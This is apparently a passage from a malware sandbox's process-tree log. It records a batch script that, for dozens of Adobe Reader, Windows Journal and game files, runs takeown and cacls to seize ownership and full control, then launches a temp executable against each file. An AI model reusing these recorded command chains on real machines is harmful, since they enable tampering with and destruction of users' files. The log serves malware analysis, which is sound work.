    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:3000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:2124
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:3048
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2156
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui""
  2⤵
  PID:2088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:2200
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:1396
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:2100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2240
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:2228
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:2204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2368
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:2288
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2248
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""
  2⤵
  PID:2416
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C
    3⤵
    PID:2448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ChessMCE.png" -nobanner
    3⤵
    PID:2392
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ChessMCE.png" -nobanner
      4⤵
      PID:2400
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  PID:2412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:2536
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "classes.jsa" -nobanner
      4⤵
      PID:2556
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2504
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""
  2⤵
  PID:2500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PurblePlaceMCE.png" -nobanner
    3⤵
    PID:2640
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PurblePlaceMCE.png" -nobanner
      4⤵
      PID:2660
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2596
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""
  2⤵
  PID:2568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "SolitaireMCE.png" -nobanner
    3⤵
    PID:2736
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "SolitaireMCE.png" -nobanner
      4⤵
      PID:2716
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""
  2⤵
  PID:2620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
    3⤵
    PID:624
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
      4⤵
      PID:1640
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui""
  2⤵
  PID:2776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:1516
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      PID:2652
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui""
  2⤵
  PID:2768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:996
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:1984
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui""
  2⤵
  PID:532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    PID:1812
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      PID:1280
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:688
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui""
  2⤵
  PID:2332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:268
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:2852
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""
  2⤵
  PID:236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PDIALOG.exe" -nobanner
    3⤵
    PID:2976
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PDIALOG.exe" -nobanner
      4⤵
      PID:2832
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp""
  2⤵
  PID:2876
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "Shorthand.jtp" -nobanner
    3⤵
    PID:2060
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "Shorthand.jtp" -nobanner
      4⤵
      PID:228
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2780
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui""
  2⤵
  PID:3028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:2156
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:2992
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1296
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:2128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1396
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2076
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:3004
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2168
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:2172
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2288
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:308
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""
  2⤵
  PID:2272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"
    3⤵
    PID:2468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "br.gif" -nobanner
    3⤵
    PID:2388
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "br.gif" -nobanner
      4⤵
      PID:2408
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  2⤵
  PID:2480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "form_responses.gif" -nobanner
    3⤵
    PID:2404
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "form_responses.gif" -nobanner
      4⤵
      PID:2496
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  2⤵
  PID:2648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
    3⤵
    PID:2660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "review_email.gif" -nobanner
    3⤵
    PID:2640
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "review_email.gif" -nobanner
      4⤵
      PID:2472
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  2⤵
  PID:2528
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "tr.gif" -nobanner
    3⤵
    PID:2756
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "tr.gif" -nobanner
      4⤵
      PID:2592
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""
  2⤵
  PID:2532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:2792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "CourierStd-Bold.otf" -nobanner
    3⤵
    PID:1640
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "CourierStd-Bold.otf" -nobanner
      4⤵
      PID:624
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""
  2⤵
  PID:2620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:428
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "MyriadPro-It.otf" -nobanner
    3⤵
    PID:2712
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "MyriadPro-It.otf" -nobanner
      4⤵
      PID:2032
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""
  2⤵
  PID:2776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
    3⤵
    PID:952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
    3⤵
    PID:1732
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
      4⤵
      PID:1984
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""
  2⤵
  PID:804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"
    3⤵
    PID:2844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "can.hyp" -nobanner
    3⤵
    PID:1820
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "can.hyp" -nobanner
      4⤵
      PID:1068
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""
  2⤵
  PID:2824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C
    3⤵
    PID:2812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"
    3⤵
    - Modifies file permissions
    PID:204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "usa37.hyp" -nobanner
    3⤵
    PID:2884
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "usa37.hyp" -nobanner
      4⤵
      PID:2848
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:268
